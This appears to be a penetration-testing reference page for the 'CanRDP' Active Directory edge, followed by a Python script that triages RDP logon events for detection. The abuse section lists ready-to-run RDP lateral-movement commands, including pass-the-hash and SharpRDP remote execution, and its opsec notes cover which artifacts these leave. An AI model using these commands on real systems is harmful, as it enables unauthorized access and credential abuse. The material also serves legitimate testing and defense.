CanRDP

Principal has the right to log in to the target computer via Remote Desktop (RDP).

Applies to: User/Group → Computer


Linux Abuse

xfreerdp (password)

xfreerdp /u:<username> /p:'<password>' /d:<domain> /v:<target> /dynamic-resolution

xfreerdp (pass-the-hash)

xfreerdp /u:<username> /pth:<ntlm-hash> /d:<domain> /v:<target> /dynamic-resolution

xfreerdp (Kerberos ccache)

KRB5CCNAME=<ccache> xfreerdp /u:<username> /d:<domain> /v:<target> /sec:kerberos /dynamic-resolution

Windows Abuse

mstsc (interactive)

mstsc /v:<target>

PowerShell (cmdkey + mstsc)

cmdkey /generic:<target> /user:<domain>\<username> /pass:<password>
mstsc /v:<target>

SharpRDP (remote exec via RDP without GUI)

SharpRDP.exe computername=<target> command="calc.exe" username=<domain>\<username> password=<password>

Opsec

  • RDP logins generate Event ID 4624 (logon type 10) and 4778/4779 on the target
  • Pass-the-hash via xfreerdp requires Restricted Admin mode to be enabled on the target (HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin = 0)
  • SharpRDP leaves fewer GUI artifacts than an interactive mstsc session
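
Detection triage for the events listed above, as an added example that is not part of the original page: it pairs each 4624 type-10 logon with its 4778 (session reconnect) and 4779 (session disconnect) events and marks logons that need review. Assumptions: events arrive as dicts from a JSON export of the Security log, field names follow the EventData names of those events, RestrictedAdminMode is exported as "Yes"/"No", and the approved-account list is hypothetical.

```python
# Constructed sample events (not real log data). Field names are assumed to
# follow the EventData names of Security events 4624, 4778 and 4779.
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 10, "TargetUserName": "alice", "TargetDomainName": "CORP",
     "IpAddress": "10.0.5.20", "TargetLogonId": "0x3e7a1", "RestrictedAdminMode": "No"},
    {"EventID": 4778, "AccountName": "alice", "AccountDomain": "CORP",
     "LogonID": "0x3e7a1", "ClientAddress": "10.0.5.20"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "svc_backup", "TargetDomainName": "CORP",
     "IpAddress": "10.0.5.30", "TargetLogonId": "0x4a001", "RestrictedAdminMode": "-"},
    {"EventID": 4624, "LogonType": 10, "TargetUserName": "bob", "TargetDomainName": "CORP",
     "IpAddress": "10.0.9.77", "TargetLogonId": "0x5b2c4", "RestrictedAdminMode": "Yes"},
    {"EventID": 4779, "AccountName": "alice", "AccountDomain": "CORP",
     "LogonID": "0x3e7a1", "ClientAddress": "10.0.5.20"},
]


def triage_rdp_logons(events, approved_accounts):
    """Return one record per 4624 type-10 (RemoteInteractive) logon, keyed by logon ID."""
    sessions = {}
    for ev in events:
        if ev["EventID"] == 4624 and int(ev["LogonType"]) == 10:
            account = f'{ev["TargetDomainName"]}\\{ev["TargetUserName"]}'.lower()
            reasons = []
            if account not in approved_accounts:
                reasons.append("account not on approved RDP list")
            # Restricted Admin is the mode the page names as the pass-the-hash prerequisite.
            if ev.get("RestrictedAdminMode") == "Yes":
                reasons.append("Restricted Admin logon")
            sessions[ev["TargetLogonId"]] = {
                "account": account, "source": ev["IpAddress"],
                "reasons": reasons, "session_events": []}
    # Second pass so 4778/4779 attach even if they precede the 4624 in the export.
    # Assumes their LogonID equals the TargetLogonId of the matching 4624.
    for ev in events:
        if ev["EventID"] in (4778, 4779) and ev["LogonID"] in sessions:
            sessions[ev["LogonID"]]["session_events"].append(ev["EventID"])
    return sessions


def flagged(sessions):
    """Logon IDs with at least one review reason, sorted for stable output."""
    return sorted(lid for lid, s in sessions.items() if s["reasons"])


if __name__ == "__main__":
    result = triage_rdp_logons(SAMPLE_EVENTS, {"corp\\alice"})
    for logon_id in flagged(result):
        print(logon_id, result[logon_id])
```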